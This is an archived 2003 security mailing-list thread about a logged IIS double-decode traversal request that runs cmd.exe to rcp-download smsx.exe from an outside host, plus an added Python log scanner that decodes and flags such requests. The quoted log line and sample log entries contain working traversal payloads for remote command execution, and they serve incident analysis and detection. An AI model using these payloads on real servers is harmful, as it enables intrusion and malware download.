No, adm is the user, at least according to the rcp usage instructions.

H:\>rcp
Copies files to and from computer running the RCP service.

RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:]
                                               path\destination

  -a                 Specifies ASCII transfer mode. This mode converts
                     the EOL characters to a carriage return for UNIX
                     and a carriage return/line feed for personal
                     computers. This is the default transfer mode.
  -b                 Specifies binary image transfer mode.
  -h                 Transfers hidden files.
  -r                 Copies the contents of all subdirectories;
                     destination must be a directory.
  host               Specifies the local or remote host. If host is
                     specified as an IP address OR if host name
                     contains dots, you must specify the user.
  .user:             Specifies a user name to use, rather than the
                     current user name.
  source             Specifies the files to copy.
  path\destination   Specifies the path relative to the logon
                     directory on the remote host. Use the escape
                     characters (\ , ", or ') in remote paths to use
                     wildcard characters on the remote host.

"rcp -b 195.92.252.138.adm:smsx.exe ."

RCP smsx.exe from 195.92.252.138 to . (here) as user adm.

Your windows guy should have tried typing the command with no arguments... ;-P

Cory Altheide
Computer Forensics Specialist
NCI Information Systems, Inc.
NNSA Cyber Forensics Center
altheidecat_private

> -----Original Message-----
> From: Steve Bromwich [mailto:incidentat_private]
> Sent: Monday, May 05, 2003 10:30 AM
> To: incidentsat_private
> Subject: smsx.exe?
>
> Hi,
>
> Has anyone seen a request like this in their logs?
>
> 205.247.193.56 - - [05/May/2003:11:59:52 -0300]
> "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."
>
> I tried rcping smsx.exe off the remote site but no joy; is the .adm an
> obscure windows-specific port address or something? One of our windows
> guys said the smsx was "remote management software", but had no idea
> about the .adm...
>
> On a side note, the response I got from energis (the 195.92.252.138
> owner) had the following at the start:
>
> PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG
>
> Further down:
>
> Please note that if one of our IP addresses looks up to a 'webcache'
> (as opposed to a modem) we have a *maximum* of 30 hours to trace the
> user responsible for the abuse.
>
> So I guess this means that Energis users have a pretty good chance of
> abusing remote servers through Energis' web cache and getting away
> with it :-/
>
> Cheers, Steve
>
> ----------------------------------------------------------------------------
> Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
> world's premier event for IT and network security experts. The two-day
> Training features 6 hands-on courses on May 12-13 taught by professionals.
> The two-day Briefings on May 14-15 features 24 top speakers with no vendor
> sales pitches. Deadline for the best rates is April 25. Register today to
> ensure your place. http://www.securityfocus.com/BlackHat-incidents
> ----------------------------------------------------------------------------
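The request in the thread is the IIS "double decode" traversal (%255c decodes to %5c, which decodes to a backslash) used to reach cmd.exe and shell out to rcp, and the reply above shows how rcp's host.user:file operand is read. The log scanner below is an added example, not code from either poster or from the list: it undoes nested percent-encoding, flags requests that escape the web root into cmd.exe, splits the '+'-separated command line that IIS hands to cmd.exe, and parses rcp operands by the rule in the usage text (a dotted host means the trailing .user is mandatory). It goes slightly beyond the thread by also translating the overlong UTF-8 separators (%c0%af, %c1%9c) of the earlier IIS Unicode traversal. The log lines, source addresses, timestamps and function names are all constructed for the example.

```python
"""
Added example (not from the original thread): scan web-server access logs for
the IIS double-decode / Unicode traversal pattern that invokes cmd.exe, undo
the nested percent-encoding, and recover the command line, including the
rcp source host/user/file when the command is an rcp fetch.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic). The first mirrors the
# request quoted in the thread; the others are filler and a Unicode variant.
SAMPLE_LOG = """\
205.247.193.56 - - [05/May/2003:11:59:52 -0300] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+. HTTP/1.0" 200 -
10.0.0.7 - - [05/May/2003:12:00:10 -0300] "GET /index.html HTTP/1.1" 200 1024
10.0.0.9 - - [05/May/2003:12:01:02 -0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
"""

# Common-log-style line; the method and HTTP version are optional so the
# bare quoted request shown in the thread is accepted too.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?:[A-Z]+ )?(?P<req>[^" ]+)(?: HTTP/[\d.]+)?"'
)

# Overlong UTF-8 forms of '/' and '\' that the IIS Unicode bug accepted as
# path separators; a strict UTF-8 decoder rejects them, so map them by hand.
OVERLONG_RE = re.compile(r'%c0%af|%c1%9c', re.IGNORECASE)
OVERLONG = {'%c0%af': '/', '%c1%9c': '\\'}


def fully_decode(s, max_rounds=4):
    """Undo nested percent-encoding until it stops changing
    (%255c -> %5c -> '\\'), translating overlong separators each round."""
    for _ in range(max_rounds):
        d = OVERLONG_RE.sub(lambda m: OVERLONG[m.group(0).lower()], s)
        d = unquote(d)
        if d == s:
            break
        s = d
    return s


def parse_cmd_request(req):
    """Return details if the request traverses out of the web root to cmd.exe,
    else None. IIS passes the query string to cmd.exe with '+' as spaces."""
    path, _, query = req.partition('?')
    decoded = fully_decode(path).replace('\\', '/')
    traverses = re.search(r'(^|/)\.\.(/|$)', decoded) is not None
    if not traverses or not decoded.lower().endswith('/cmd.exe'):
        return None
    return {
        'decoded_path': decoded,
        'resolved': posixpath.normpath(decoded),
        'double_encoded': '%25' in path.lower(),
        'argv': [a for a in fully_decode(query).split('+') if a],
    }


def parse_rcp_operand(operand):
    """Split an rcp operand into (host, user, path) following the usage text:
    a local path has no ':'; when the host part contains a dot (IP address or
    dotted name) the trailing '.user' is mandatory, so it is split off."""
    if ':' not in operand:
        return None, None, operand
    left, _, path = operand.partition(':')
    if '.' in left:
        host, _, user = left.rpartition('.')
        return host, user, path
    return left, None, path


def analyze_line(line):
    """Parse one access-log line; return a hit dict or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    info = parse_cmd_request(m.group('req'))
    if info is None:
        return None
    hit = {'src': m.group('src'), 'ts': m.group('ts'), 'fetch': None, **info}
    argv = info['argv']
    # "/c rcp [-a|-b] [-h] [-r] source destination": drop flags, keep operands
    if len(argv) >= 2 and argv[0].lower() == '/c' and argv[1].lower() == 'rcp':
        operands = [a for a in argv[2:] if not a.startswith('-')]
        if len(operands) == 2:
            host, user, src = parse_rcp_operand(operands[0])
            hit['fetch'] = {'host': host, 'user': user,
                            'source': src, 'dest': operands[1]}
    return hit


def analyze_log(text):
    """Run analyze_line over every line, returning the hits in order."""
    return [h for h in (analyze_line(l) for l in text.splitlines()) if h]


if __name__ == '__main__':
    for h in analyze_log(SAMPLE_LOG):
        print(h['src'], h['resolved'], h['argv'], h['fetch'])
```

Decoding in a loop until the string stops changing is the point: a single unquote() sees only "%5c" and never the backslash, which is exactly why the double-encoded form slipped past IIS's own traversal check. The fetch record it produces (host 195.92.252.138, user adm, file smsx.exe) is what you would hand to whoever traces the source, and a rcp hit with a remote source is worth alerting on by itself.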
This archive was generated by hypermail 2b30 : Mon May 05 2003 - 17:34:39 PDT